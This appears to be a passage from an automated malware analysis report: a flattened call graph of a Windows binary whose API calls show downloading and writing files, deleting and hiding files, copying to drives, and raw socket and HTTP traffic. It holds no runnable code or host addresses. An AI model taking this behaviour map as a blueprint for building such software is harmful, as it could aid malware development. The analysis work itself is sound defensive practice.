403cae 4771->4772 4773 402820 _invalid_parameter 7 API calls 4772->4773 4774 403ccb 4773->4774 4775 402820 _invalid_parameter 7 API calls 4774->4775 4776 403cda _invalid_parameter 4775->4776 4777 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4776->4777 4778 403d3a _invalid_parameter 4776->4778 4777->4776 4779 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4778->4779 4780 403d60 4778->4780 4779->4778 4780->4743 4782 402820 _invalid_parameter 7 API calls 4781->4782 4783 404697 4782->4783 4784 402820 _invalid_parameter 7 API calls 4783->4784 4785 4046a6 4784->4785 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 4046b5 _invalid_parameter __aligned_recalloc_base 4786->4787 4788 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4787->4788 4790 404841 _invalid_parameter 4787->4790 4788->4787 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4789->4790 4790->4789 4791 404867 _invalid_parameter 4790->4791 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4791->4792 4793 40488d 4791->4793 4792->4791 4793->4743 4795 402820 _invalid_parameter 7 API calls 4794->4795 4796 403d7f _invalid_parameter 4795->4796 4797 403ca0 _invalid_parameter 9 API calls 4796->4797 4798 403db8 _invalid_parameter 4797->4798 4799 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4798->4799 4800 403de3 4798->4800 4799->4798 4800->4760 4802 409d22 4801->4802 4805 409c70 4802->4805 4806 409fa0 _invalid_parameter 7 API calls 4805->4806 4811 409c80 4806->4811 4807 407b0f 4807->4670 4809 409cbc 4812 40a1b0 _invalid_parameter 3 API calls 4809->4812 4811->4807 4811->4809 4814 4091a0 4811->4814 4821 409790 4811->4821 4826 409b60 4811->4826 4812->4807 4815 4091b3 4814->4815 4820 4091a9 4814->4820 4816 4091f6 memset 4815->4816 4815->4820 4817 409217 4816->4817 4816->4820 4818 40921d memcpy 4817->4818 4817->4820 4834 408f70 4818->4834 4820->4811 4822 40979d 4821->4822 4823 4097a7 4821->4823 4822->4811 4823->4822 4824 40989f memcpy 4823->4824 4839 4094c0 4823->4839 4824->4823 4827 409b6c 4826->4827 4830 409b76 4826->4830 4827->4811 4828 4094c0 64 API calls 4829 409bf7 4828->4829 4829->4827 4831 408f70 6 API calls 4829->4831 4830->4827 4830->4828 4832 409c16 4831->4832 4832->4827 4833 409c2b memcpy 4832->4833 4833->4827 4835 408fbe 4834->4835 4837 408f7e 4834->4837 4835->4820 4837->4835 4838 408eb0 6 API calls 4837->4838 4838->4837 4840 4094da 4839->4840 4843 4094d0 4839->4843 4840->4843 4849 409300 4840->4849 4843->4823 4844 409618 memcpy 4844->4843 4846 409637 memcpy 4847 409761 4846->4847 4848 4094c0 62 API calls 4847->4848 4848->4843 4850 40930d 4849->4850 4851 409317 4849->4851 4850->4843 4850->4844 4850->4846 4851->4850 4852 4093a0 4851->4852 4853 4093a5 4851->4853 4854 409388 4851->4854 4860 408c60 4852->4860 4857 408f70 6 API calls 4853->4857 4856 408f70 6 API calls 4854->4856 4856->4852 4857->4852 4859 40944c memset 4859->4850 4861 408c6f 4860->4861 4862 408c79 4860->4862 4861->4850 4861->4859 4862->4861 4863 408b30 9 API calls 4862->4863 4864 408d72 4863->4864 4865 409fa0 _invalid_parameter 7 API calls 4864->4865 4866 408dc1 4865->4866 4866->4861 4867 4089a0 46 API calls 4866->4867 4868 408dee 4867->4868 4869 40a1b0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4868->4869 4869->4861 4889 409e50 GetCurrentProcessId 4870->4889 4872 409feb 4873 409e70 _invalid_parameter 5 API calls 4872->4873 4877 409ff7 _invalid_parameter 4872->4877 4873->4877 4874 40a0f0 _invalid_parameter HeapValidate 4874->4877 4875 40a0a0 HeapAlloc 4875->4877 4876 40a06a HeapReAlloc 4876->4877 4877->4874 4877->4875 4877->4876 4878 40a1b0 _invalid_parameter 3 API calls 4877->4878 4879 405d15 4877->4879 4878->4877 4879->4650 4879->4655 4882 40c19b 4880->4882 4881 409fa0 _invalid_parameter 7 API calls 4881->4882 4882->4881 4883 405dad 4882->4883 4883->4655 4884 407310 4883->4884 4885 409fa0 _invalid_parameter 7 API calls 4884->4885 4886 407320 4885->4886 4887 407367 4886->4887 4888 40732c memcpy CreateThread 4886->4888 4887->4655 4888->4887 4890 407370 GetTickCount srand rand Sleep 4888->4890 4889->4872 4891 4073a7 4890->4891 4892 4073fd 4890->4892 4895 4073b6 StrChrA 4891->4895 4896 4073fb 4891->4896 4900 40eae0 9 API calls 4891->4900 4893 40eae0 56 API calls 4892->4893 4892->4896 4893->4896 4894 40a1b0 _invalid_parameter 3 API calls 4897 407428 4894->4897 4895->4891 4896->4894 4901 40ed03 InternetCloseHandle Sleep 4900->4901 4902 40eba3 InternetOpenUrlW 4900->4902 4905 40ed2a 6 API calls 4901->4905 4922 4073e5 Sleep 4901->4922 4903 40ebd2 CreateFileW 4902->4903 4904 40ecf6 InternetCloseHandle 4902->4904 4907 40ec01 InternetReadFile 4903->4907 4926 40ecd3 4903->4926 4904->4901 4906 40eda6 wsprintfW DeleteFileW 4905->4906 4905->4922 4908 40e7c0 18 API calls 4906->4908 4909 40ec54 wsprintfW DeleteFileW 4907->4909 4910 40ec25 4907->4910 4911 40eddb 4908->4911 4928 40e7c0 CreateFileW 4909->4928 4910->4909 4912 40ec2e WriteFile 4910->4912 4914 40ede5 Sleep 4911->4914 4915 40ee19 DeleteFileW 4911->4915 4912->4907 4917 40e980 6 API calls 4914->4917 4915->4922 4919 40edfc 4917->4919 4919->4922 4924 40ee0f ExitProcess 4919->4924 4920 40eca0 Sleep 4923 40e980 6 API calls 4920->4923 4921 40ecdc DeleteFileW 4921->4926 4922->4891 4925 40ecb7 4923->4925 4925->4926 4927 40eccb ExitProcess 4925->4927 4926->4904 4929 40e805 CreateFileMappingW 4928->4929 4930 40e906 4928->4930 4929->4930 4931 40e826 MapViewOfFile 4929->4931 4932 40e920 CreateFileW 4930->4932 4940 40e971 4930->4940 4931->4930 4933 40e845 GetFileSize 4931->4933 4934 40e942 WriteFile 4932->4934 4935 40e968 4932->4935 4936 40e861 4933->4936 4937 40e8fc UnmapViewOfFile 4933->4937 4934->4935 4938 40a1b0 _invalid_parameter 3 API calls 4935->4938 4948 40c7f0 4936->4948 4937->4930 4938->4940 4940->4920 4940->4921 4942 40c190 7 API calls 4943 40e8b0 4942->4943 4943->4937 4944 40e8cd memcmp 4943->4944 4944->4937 4945 40e8e9 4944->4945 4946 40a1b0 _invalid_parameter 3 API calls 4945->4946 4947 40e8f2 4946->4947 4947->4937 4949 40c220 10 API calls 4948->4949 4950 40c814 4949->4950 4950->4937 4950->4942 4952 40d73d htons inet_addr setsockopt 4951->4952 4957 40d86e 4951->4957 4953 40aa80 8 API calls 4952->4953 4954 40d7b6 bind lstrlenA sendto ioctlsocket 4953->4954 4960 40d80b 4954->4960 4957->4440 4958 40d832 5008 40ab40 shutdown closesocket 4958->5008 4959 409fe0 9 API calls 4959->4960 4960->4958 4960->4959 4999 40d890 4960->4999 5015 40dbc0 memset InternetCrackUrlA InternetOpenA 4961->5015 4964 40da9e 4964->4440 4967 40a1b0 _invalid_parameter 3 API calls 4967->4964 4968 40da6b 4968->4967 4973 40da61 SysFreeString 4973->4968 5122 40aa40 inet_addr 4976->5122 4979 40ab2d 4984 40e470 4979->4984 4980 40aadc connect 4981 40aaf0 getsockname 4980->4981 4982 40ab24 4980->4982 4981->4982 5125 40ab40 shutdown closesocket 4982->5125 5126 40aa20 inet_ntoa 4984->5126 4986 40e486 4987 40c9f0 11 API calls 4986->4987 4988 40e4a5 4987->4988 4989 40d6cc 4988->4989 5127 40e4f0 memset InternetCrackUrlA InternetOpenA 4988->5127 4989->4445 4992 40e4dc 4994 40a1b0 _invalid_parameter 3 API calls 4992->4994 4993 40a1b0 _invalid_parameter 3 API calls 4993->4992 4994->4989 4998 40a2d4 4995->4998 4996 40a2da 4996->4435 4997 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4997->4998 4998->4996 4998->4997 5004 40d8ac 4999->5004 5000 40d974 5000->4960 5001 40d8c8 recvfrom 5002 40d8f6 StrCmpNIA 5001->5002 5003 40d8e9 Sleep 5001->5003 5002->5004 5005 40d915 StrStrIA 5002->5005 5003->5004 5004->5000 5004->5001 5005->5004 5006 40d936 StrChrA 5005->5006 5009 40c8a0 5006->5009 5008->4957 5010 40c8ab 5009->5010 5011 40c8b1 lstrlenA 5010->5011 5012 409fa0 _invalid_parameter 7 API calls 5010->5012 5013 40c8e0 memcpy 5010->5013 5014 40c8c4 5010->5014 5011->5010 5011->5014 5012->5010 5013->5010 5013->5014 5014->5004 5016 40dc61 InternetConnectA 5015->5016 5017 40d99a 5015->5017 5018 40ddca InternetCloseHandle 5016->5018 5019 40dc9a HttpOpenRequestA 5016->5019 5017->4964 5028 40dab0 5017->5028 5018->5017 5020 40dcd0 HttpSendRequestA 5019->5020 5021 40ddbd InternetCloseHandle 5019->5021 5022 40ddb0 InternetCloseHandle 5020->5022 5024 40dced 5020->5024 5021->5018 5022->5021 5023 40dd0e InternetReadFile 5023->5024 5025 40dd3b 5023->5025 5024->5023 5024->5025 5026 409fe0 9 API calls 5024->5026 5025->5022 5027 40dd56 memcpy 5026->5027 5027->5024 5057 405690 5028->5057 5031 40d9b3 5031->4968 5038 40e420 5031->5038 5032 40dada SysAllocString 5033 40daf1 CoCreateInstance 5032->5033 5034 40dba7 5032->5034 5035 40db9d SysFreeString 5033->5035 5037 40db16 5033->5037 5036 40a1b0 _invalid_parameter 3 API calls 5034->5036 5035->5034 5036->5031 5037->5035 5074 40df70 5038->5074 5041 40ddf0 5079 40e240 5041->5079 5046 40e3a0 6 API calls 5047 40de47 5046->5047 5053 40da32 5047->5053 5096 40e060 5047->5096 5050 40de7f 5050->5053 5101 40df10 5050->5101 5051 40e060 6 API calls 5051->5050 5053->4973 5054 40c9f0 5053->5054 5117 40c960 5054->5117 5062 40569d 5057->5062 5058 4056a3 lstrlenA 5058->5062 5063 4056b6 5058->5063 5060 409fa0 _invalid_parameter 7 API calls 5060->5062 5062->5058 5062->5060 5062->5063 5064 40a1b0 _invalid_parameter 3 API calls 5062->5064 5065 405630 5062->5065 5069 4055e0 5062->5069 5063->5031 5063->5032 5064->5062 5066 405647 MultiByteToWideChar 5065->5066 5067 40563a lstrlenA 5065->5067 5068 40566c 5066->5068 5067->5066 5068->5062 5072 4055eb 5069->5072 5070 4055f1 lstrlenA 5070->5072 5071 405630 2 API calls 5071->5072 5072->5070 5072->5071 5073 405627 5072->5073 5073->5062 5077 40df96 5074->5077 5075 40da1d 5075->4968 5075->5041 5076 40e013 lstrcmpiW 5076->5077 5078 40e02b SysFreeString 5076->5078 5077->5075 5077->5076 5077->5078 5078->5077 5081 40e266 5079->5081 5080 40de0b 5080->5053 5091 40e3a0 5080->5091 5081->5080 5082 40e2f3 lstrcmpiW 5081->5082 5083 40e373 SysFreeString 5082->5083 5084 40e306 5082->5084 5083->5080 5085 40df10 2 API calls 5084->5085 5087 40e314 5085->5087 5086 40e365 5086->5083 5087->5083 5087->5086 5088 40e343 lstrcmpiW 5087->5088 5089 40e355 5088->5089 5090 40e35b SysFreeString 5088->5090 5089->5090 5090->5086 5092 40df10 2 API calls 5091->5092 5094 40e3bb 5092->5094 5093 40de29 5093->5046 5093->5053 5094->5093 5095 40e240 6 API calls 5094->5095 5095->5093 5097 40df10 2 API calls 5096->5097 5099 40e07b 5097->5099 5098 40de65 5098->5050 5098->5051 5099->5098 5105 40e0e0 5099->5105 5102 40df36 5101->5102 5103 40df70 2 API calls 5102->5103 5104 40df4d 5102->5104 5103->5104 5104->5053 5106 40e106 5105->5106 5107 40e21d 5106->5107 5108 40e193 lstrcmpiW 5106->5108 5107->5098 5109 40e213 SysFreeString 5108->5109 5110 40e1a6 5108->5110 5109->5107 5111 40df10 2 API calls 5110->5111 5113 40e1b4 5111->5113 5112 40e205 5112->5109 5113->5109 5113->5112 5114 40e1e3 lstrcmpiW 5113->5114 5115 40e1f5 5114->5115 5116 40e1fb SysFreeString 5114->5116 5115->5116 5116->5112 5119 40c96d 5117->5119 5118 40c910 _vscprintf wvsprintfA 5118->5119 5119->5118 5120 409fe0 9 API calls 5119->5120 5121 40c988 SysFreeString 5119->5121 5120->5119 5121->4973 5123 40aa6c socket 5122->5123 5124 40aa59 gethostbyname 5122->5124 5123->4979 5123->4980 5124->5123 5125->4979 5126->4986 5128 40e4c7 5127->5128 5129 40e594 InternetConnectA 5127->5129 5128->4992 5128->4993 5130 40e714 InternetCloseHandle 5129->5130 5131 40e5cd HttpOpenRequestA 5129->5131 5130->5128 5132 40e603 HttpAddRequestHeadersA HttpSendRequestA 5131->5132 5133 40e707 InternetCloseHandle 5131->5133 5134 40e6fa InternetCloseHandle 5132->5134 5137 40e64d 5132->5137 5133->5130 5134->5133 5135 40e664 InternetReadFile 5136 40e691 5135->5136 5135->5137 5136->5134 5137->5135 5137->5136 5138 409fe0 9 API calls 5137->5138 5139 40e6ac memcpy 5138->5139 5139->5137 5145 407067 5140->5145 5141 40723b 5143 407244 SysFreeString 5141->5143 5144 40700b SysFreeString 5141->5144 5142 40a1b0 _invalid_parameter 3 API calls 5142->5141 5143->5144 5144->4448 5146 4072c0 CoCreateInstance 5145->5146 5147 4071b6 SysAllocString 5145->5147 5148 407082 5145->5148 5146->5145 5147->5145 5147->5148 5148->5141 5148->5142 5150 40beca 5149->5150 5151 40bece 5149->5151 5150->4454 5153 40be80 CryptAcquireContextW 5151->5153 5154 40bebb 5153->5154 5155 40be9d CryptGenRandom CryptReleaseContext 5153->5155 5154->5150 5155->5154 5156->4477 5208 40add0 gethostname 5157->5208 5160 40aeb9 5160->4477 5162 40aecc strcmp 5162->5160 5163 40aee1 5162->5163 5212 40aa20 inet_ntoa 5163->5212 5165 40aeef strstr 5166 40af40 5165->5166 5167 40aeff 5165->5167 5215 40aa20 inet_ntoa 5166->5215 5213 40aa20 inet_ntoa 5167->5213 5170 40af0d strstr 5170->5160 5172 40af1d 5170->5172 5171 40af4e strstr 5173 40af5e 5171->5173 5174 40af9f 5171->5174 5214 40aa20 inet_ntoa 5172->5214 5216 40aa20 inet_ntoa 5173->5216 5218 40aa20 inet_ntoa 5174->5218 5178 40af6c strstr 5178->5160 5181 40af7c 5178->5181 5179 40afad strstr 5182 40afbd 5179->5182 5183 40affe EnterCriticalSection 5179->5183 5180 40af2b strstr 5180->5160 5180->5166 5217 40aa20 inet_ntoa 5181->5217 5219 40aa20 inet_ntoa 5182->5219 5184 40b016 5183->5184 5193 40b041 5184->5193 5221 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5184->5221 5187 40af8a strstr 5187->5160 5187->5174 5188 40afcb strstr 5188->5160 5189 40afdb 5188->5189 5220 40aa20 inet_ntoa 5189->5220 5192 40b13a LeaveCriticalSection 5192->5160 5193->5192 5195 409d90 7 API calls 5193->5195 5194 40afe9 strstr 5194->5160 5194->5183 5196 40b085 5195->5196 5196->5192 5222 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5196->5222 5198 40b0a3 5199 40b0d0 5198->5199 5200 40b0c6 Sleep 5198->5200 5202 40b0f5 5198->5202 5201 40a1b0 _invalid_parameter 3 API calls 5199->5201 5200->5198 5201->5202 5202->5192 5223 40ab80 5202->5223 5204->4480 5206 40ab80 13 API calls 5205->5206 5207 40ab73 LeaveCriticalSection 5206->5207 5207->4474 5209 40adf7 gethostbyname 5208->5209 5210 40ae13 5208->5210 5209->5210 5210->5160 5211 40aa20 inet_ntoa 5210->5211 5211->5162 5212->5165 5213->5170 5214->5180 5215->5171 5216->5178 5217->5187 5218->5179 5219->5188 5220->5194 5221->5193 5222->5198 5224 40ab94 5223->5224 5225 40ab8f 5223->5225 5226 409fa0 _invalid_parameter 7 API calls 5224->5226 5225->5192 5228 40aba8 5226->5228 5227 40ac04 CreateFileW 5229 40ac53 InterlockedExchange 5227->5229 5230 40ac27 WriteFile FlushFileBuffers 5227->5230 5228->5225 5228->5227 5231 40a1b0 _invalid_parameter 3 API calls 5229->5231 5230->5229 5231->5225 5233 40d25d 5232->5233 5234 40d193 5233->5234 5235 40d281 WaitForSingleObject 5233->5235 5234->4487 5234->4488 5235->5233 5239 407490 5236->5239 5237 4074b8 Sleep 5237->5239 5238 40756a Sleep 5238->5239 5239->5237 5239->5238 5240 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5239->5240 5242 40eae0 56 API calls 5239->5242 5266 40ea30 InternetOpenA 5240->5266 5242->5239 5244 405889 memset GetModuleHandleW 5243->5244 5245 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5244->5245 5245->5245 5246 405900 CreateWindowExW 5245->5246 5247 40592b 5246->5247 5248 40592d GetMessageA 5246->5248 5249 40595f ExitThread 5247->5249 5250 405941 TranslateMessage DispatchMessageA 5248->5250 5251 405957 5248->5251 5250->5248 5251->5244 5251->5249 5273 40e770 CreateFileW 5252->5273 5254 406d48 ExitThread 5256 406bf0 5256->5254 5257 406d38 Sleep 5256->5257 5258 406c29 5256->5258 5276 4063a0 GetLogicalDrives 5256->5276 5257->5256 5282 4062c0 5258->5282 5261 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5262 406cd6 wsprintfW 5261->5262 5263 406ceb wsprintfW 5261->5263 5262->5263 5288 4066b0 _chkstk 5263->5288 5265 406c5b 5267 40ea56 InternetOpenUrlA 5266->5267 5268 40eac8 Sleep 5266->5268 5269 40ea75 HttpQueryInfoA 5267->5269 5270 40eabe InternetCloseHandle 5267->5270 5268->5239 5271 40eab4 InternetCloseHandle 5269->5271 5272 40ea9e 5269->5272 5270->5268 5271->5270 5272->5271 5274 40e7b8 5273->5274 5275 40e79f GetFileSize 5273->5275 5274->5256 5275->5274 5281 4063cd 5276->5281 5277 406446 5277->5256 5278 4063dc RegOpenKeyExW 5279 4063fe RegQueryValueExW 5278->5279 5278->5281 5280 40643a RegCloseKey 5279->5280 5279->5281 5280->5281 5281->5277 5281->5278 5281->5280 5283 406319 5282->5283 5284 4062dc 5282->5284 5283->5261 5283->5265 5325 406320 GetDriveTypeW 5284->5325 5287 40630b lstrcpyW 5287->5283 5289 4066ce 6 API calls 5288->5289 5301 4066c7 5288->5301 5290 406782 5289->5290 5291 4067c4 PathFileExistsW 5289->5291 5294 40e770 2 API calls 5290->5294 5292 406874 PathFileExistsW 5291->5292 5293 4067d9 PathFileExistsW 5291->5293 5297 406885 5292->5297 5298 4068ca FindFirstFileW 5292->5298 5295 406809 PathFileExistsW 5293->5295 5296 4067ea SetFileAttributesW DeleteFileW 5293->5296 5299 40678e 5294->5299 5302 40681a CreateDirectoryW 5295->5302 5303 40683c PathFileExistsW 5295->5303 5296->5295 5304 4068a5 5297->5304 5305 40688d 5297->5305 5298->5301 5323 4068f1 5298->5323 5299->5291 5300 4067a5 SetFileAttributesW DeleteFileW 5299->5300 5300->5291 5301->5265 5302->5303 5308 40682d SetFileAttributesW 5302->5308 5303->5292 5309 40684d CopyFileW 5303->5309 5306 406460 3 API calls 5304->5306 5330 406460 CoInitialize CoCreateInstance 5305->5330 5311 4068a0 SetFileAttributesW 5306->5311 5307 4069b3 lstrcmpW 5312 4069c9 lstrcmpW 5307->5312 5307->5323 5308->5303 5309->5292 5313 406865 SetFileAttributesW 5309->5313 5311->5298 5312->5323 5313->5292 5315 406b8a FindNextFileW 5315->5307 5316 406ba6 FindClose 5315->5316 5316->5301 5317 406a0f lstrcmpiW 5317->5323 5318 406a76 PathMatchSpecW 5320 406a97 wsprintfW SetFileAttributesW DeleteFileW 5318->5320 5318->5323 5319 406af4 PathFileExistsW 5321 406b0a wsprintfW wsprintfW 5319->5321 5319->5323 5320->5323 5322 406b74 MoveFileExW 5321->5322 5321->5323 5322->5315 5323->5307 5323->5315 5323->5317 5323->5318 5323->5319 5334 406570 CreateDirectoryW wsprintfW FindFirstFileW 5323->5334 5326 4062ff 5325->5326 5327 406348 5325->5327 5326->5283 5326->5287 5327->5326 5328 40635c QueryDosDeviceW 5327->5328 5328->5326 5329 406376 StrCmpNW 5328->5329 5329->5326 5331 406496 5330->5331 5333 4064d2 5330->5333 5332 4064a0 wsprintfW 5331->5332 5331->5333 5332->5333 5333->5311 5335 4065c5 lstrcmpW 5334->5335 5336 40669f 5334->5336 5337 4065f1 5335->5337 5338 4065db lstrcmpW 5335->5338 5336->5323 5340 40666c FindNextFileW 5337->5340 5338->5337 5339 4065f3 wsprintfW wsprintfW 5338->5339 5339->5337 5341 406656 MoveFileExW 5339->5341 5340->5335 5342 406688 FindClose RemoveDirectoryW 5340->5342 5341->5340 5342->5336 5352 40d0d0 5357 401b60 5352->5357 5354 40d0e5 5355 40d104 5354->5355 5356 401b60 16 API calls 5354->5356 5356->5355 5358 401c42 5357->5358 5359 401b70 5357->5359 5358->5354 5359->5358 5360 409d90 7 API calls 5359->5360 5361 401b9d 5360->5361 5361->5358 5362 40a220 8 API calls 5361->5362 5363 401bc9 5362->5363 5364 401be6 5363->5364 5365 401bd6 5363->5365 5377 401ae0 WSASend 5364->5377 5367 40a1b0 _invalid_parameter 3 API calls 5365->5367 5368 401bdc 5367->5368 5368->5354 5369 401bf3 5370 401c33 5369->5370 5371 401bfc EnterCriticalSection 5369->5371 5374 40a1b0 _invalid_parameter 3 API calls 5370->5374 5372 401c13 5371->5372 5373 401c1f LeaveCriticalSection 5371->5373 5372->5373 5373->5354 5375 401c3c 5374->5375 5376 40a1b0 _invalid_parameter 3 API calls 5375->5376 5376->5358 5378 401b50 5377->5378 5379 401b12 WSAGetLastError 5377->5379 5378->5369 5379->5378 5380 401b1f 5379->5380 5381 401b56 5380->5381 5382 401b26 Sleep WSASend 5380->5382 5381->5369 5382->5378 5382->5379 5383 40d4d0 5386 40b570 5383->5386 5394 40b581 5386->5394 5388 40b59f 5390 40a1b0 _invalid_parameter 3 API calls 5388->5390 5391 40b94f 5390->5391 5392 40b960 21 API calls 5392->5394 5394->5388 5394->5392 5396 40b520 13 API calls 5394->5396 5397 40ae80 31 API calls 5394->5397 5400 40bab0 5394->5400 5407 40b250 EnterCriticalSection 5394->5407 5412 406e90 5394->5412 5417 406f30 5394->5417 5422 406d60 5394->5422 5429 406e60 5394->5429 5396->5394 5397->5394 5401 40bac1 lstrlenA 5400->5401 5402 40c190 7 API calls 5401->5402 5406 40badf 5402->5406 5403 40baeb 5404 40bb6f 5403->5404 5405 40a1b0 _invalid_parameter 3 API calls 5403->5405 5404->5394 5405->5404 5406->5401 5406->5403 5408 40b268 5407->5408 5409 40b2a4 LeaveCriticalSection 5408->5409 5432 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5432 5409->5394 5411 40b293 5411->5409 5433 406ed0 5412->5433 5415 40d160 16 API calls 5416 406ec9 5415->5416 5416->5394 5418 406ed0 75 API calls 5417->5418 5419 406f4f 5418->5419 5420 406f7c 5419->5420 5448 406f90 5419->5448 5420->5394 5459 405fa0 EnterCriticalSection 5422->5459 5424 406dad 5424->5394 5425 406d7a 5425->5424 5464 406dc0 5425->5464 5428 40a1b0 _invalid_parameter 3 API calls 5428->5424 5471 406060 EnterCriticalSection 5429->5471 5431 406e82 5431->5394 5432->5411 5434 406ee3 5433->5434 5436 406ea4 5434->5436 5437 405eb0 EnterCriticalSection 5434->5437 5436->5415 5436->5416 5438 40c820 71 API calls 5437->5438 5439 405ece 5438->5439 5440 405f8b LeaveCriticalSection 5439->5440 5441 405ee7 5439->5441 5443 405f08 5439->5443 5440->5434 5442 405ef1 memcpy 5441->5442 5447 405f06 5441->5447 5442->5447 5446 405f66 memcpy 5443->5446 5443->5447 5444 40a1b0 _invalid_parameter 3 API calls 5445 405f88 5444->5445 5445->5440 5446->5447 5447->5444 5451 40b480 5448->5451 5452 40bf00 3 API calls 5451->5452 5453 40b48b 5452->5453 5454 40b4a7 lstrlenA 5453->5454 5455 40c190 7 API calls 5454->5455 5456 40b4dd 5455->5456 5457 406fd5 5456->5457 5458 40a1b0 _invalid_parameter 3 API calls 5456->5458 5457->5420 5458->5457 5460 405fbe 5459->5460 5461 40604a LeaveCriticalSection 5460->5461 5462 40a220 8 API calls 5460->5462 5461->5425 5463 40601c 5462->5463 5463->5461 5465 409fa0 _invalid_parameter 7 API calls 5464->5465 5466 406dd2 memcpy 5465->5466 5467 40b480 13 API calls 5466->5467 5468 406e3c 5467->5468 5469 40a1b0 _invalid_parameter 3 API calls 5468->5469 5470 406da1 5469->5470 5470->5428 5496 40c880 5471->5496 5474 4062a3 LeaveCriticalSection 5474->5431 5475 40c820 71 API calls 5476 406099 5475->5476 5476->5474 5477 4061b8 5476->5477 5478 4060f4 memcpy 5476->5478 5479 4061e1 5477->5479 5480 405cf0 68 API calls 5477->5480 5481 40a1b0 _invalid_parameter 3 API calls 5478->5481 5482 40a1b0 _invalid_parameter 3 API calls 5479->5482 5480->5479 5483 406118 5481->5483 5484 406202 5482->5484 5485 40a220 8 API calls 5483->5485 5484->5474 5486 406211 CreateFileW 5484->5486 5487 406128 5485->5487 5486->5474 5488 406234 5486->5488 5489 40a1b0 _invalid_parameter 3 API calls 5487->5489 5491 406251 WriteFile 5488->5491 5492 40628f FlushFileBuffers 5488->5492 5490 40614f 5489->5490 5493 40c190 7 API calls 5490->5493 5491->5488 5492->5474 5494 406185 5493->5494 5495 407310 64 API calls 5494->5495 5495->5477 5499 40bdd0 5496->5499 5504 40bde1 5499->5504 5500 40a220 8 API calls 5500->5504 5501 40bd30 70 API calls 5501->5504 5502 40a1b0 _invalid_parameter 3 API calls 5503 406082 5502->5503 5503->5474 5503->5475 5504->5500 5504->5501 5505 407af0 68 API calls 5504->5505 5506 40bdfb 5504->5506 5507 40be3b memcmp 5504->5507 5505->5504 5506->5502 5507->5504 5507->5506 5508 40cf50 5509 40cfbe 5508->5509 5510 40cf66 5508->5510 5510->5509 5511 40cf70 5510->5511 5512 40cfc3 5510->5512 5513 40d013 5510->5513 5514 409d90 7 API calls 5511->5514 5516 40cfe8 5512->5516 5517 40cfdb InterlockedDecrement 5512->5517 5542 40bbc0 5513->5542 5518 40cf7d 5514->5518 5519 40a1b0 _invalid_parameter 3 API calls 5516->5519 5517->5516 5531 4023d0 5518->5531 5521 40cff4 5519->5521 5523 40a1b0 _invalid_parameter 3 API calls 5521->5523 5523->5509 5525 40d039 5525->5509 5528 40d071 IsBadReadPtr 5525->5528 5530 40b570 184 API calls 5525->5530 5547 40bcc0 5525->5547 5527 40cfab InterlockedIncrement 5527->5509 5528->5525 5530->5525 5532 402413 5531->5532 5533 4023d9 5531->5533 5535 40ad40 5532->5535 5533->5532 5534 4023ea InterlockedIncrement 5533->5534 5534->5532 5536 40add0 2 API calls 5535->5536 5537 40ad4f 5536->5537 5538 40ad59 5537->5538 5539 40ad5d EnterCriticalSection 5537->5539 5538->5509 5538->5527 5540 40ad7c LeaveCriticalSection 5539->5540 5540->5538 5543 40bbd3 5542->5543 5544 40bbfd memcpy 5542->5544 5545 409fe0 9 API calls 5543->5545 5544->5525 5546 40bbf4 5545->5546 5546->5544 5548 40bce9 5547->5548 5549 40bcde 5547->5549 5548->5549 5550 40bd01 memmove 5548->5550 5549->5525 5550->5549 5551 401f50 GetQueuedCompletionStatus 5552 401f92 5551->5552 5553 402008 5551->5553 5554 401f97 WSAGetOverlappedResult 5552->5554 5558 401d60 5552->5558 5554->5552 5555 401fb9 WSAGetLastError 5554->5555 5555->5552 5557 401fd3 GetQueuedCompletionStatus 5557->5552 5557->5553 5559 401ef2 InterlockedDecrement setsockopt closesocket 5558->5559 5560 401d74 5558->5560 5562 401e39 5559->5562 5560->5559 5561 401d7c 5560->5561 5578 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5561->5578 5562->5557 5564 401d81 InterlockedExchange 5565 401d98 5564->5565 5566 401e4e 5564->5566 5565->5562 5571 401da9 InterlockedDecrement 5565->5571 5572 401dbc InterlockedDecrement InterlockedExchangeAdd 5565->5572 5567 401e67 5566->5567 5568 401e57 InterlockedDecrement 5566->5568 5569 401e72 5567->5569 5570 401e87 InterlockedDecrement 5567->5570 5568->5557 5573 401ae0 4 API calls 5569->5573 5574 401ee9 5570->5574 5571->5557 5575 401e2f 5572->5575 5576 401e7e 5573->5576 5574->5557 5579 401cf0 5575->5579 5576->5557 5578->5564 5580 401d00 InterlockedExchangeAdd 5579->5580 5581 401cfc 5579->5581 5582 401d53 5580->5582 5583 401d17 InterlockedIncrement 5580->5583 5581->5562 5582->5562 5587 401c50 WSARecv 5583->5587 5585 401d46 5585->5582 5586 401d4c InterlockedDecrement 5585->5586 5586->5582 5588 401cd2 5587->5588 5589 401c8e 5587->5589 5588->5585 5590 401c90 WSAGetLastError 5589->5590 5591 401ca4 Sleep WSARecv 5589->5591 5592 401cdb 5589->5592 5590->5588 5590->5589 5591->5588 5591->5590 5592->5585 5593 40d550 5603 4013b0 5593->5603 5595 40d5dd 5597 40d55d 5597->5595 5598 40d577 InterlockedExchangeAdd 5597->5598 5599 40d5bb WaitForSingleObject 5597->5599 5615 40b200 EnterCriticalSection 5597->5615 5620 40b520 5597->5620 5598->5597 5598->5599 5599->5597 5600 40d5d4 5599->5600 5623 401330 5600->5623 5604 409d90 7 API calls 5603->5604 5605 4013bb CreateEventA socket 5604->5605 5606 4013f2 5605->5606 5610 4013f8 5605->5610 5607 401330 7 API calls 5606->5607 5607->5610 5608 401401 bind 5611 401444 CreateThread 5608->5611 5612 401434 5608->5612 5609 401462 5609->5597 5610->5608 5610->5609 5611->5609 5633 401100 5611->5633 5613 401330 7 API 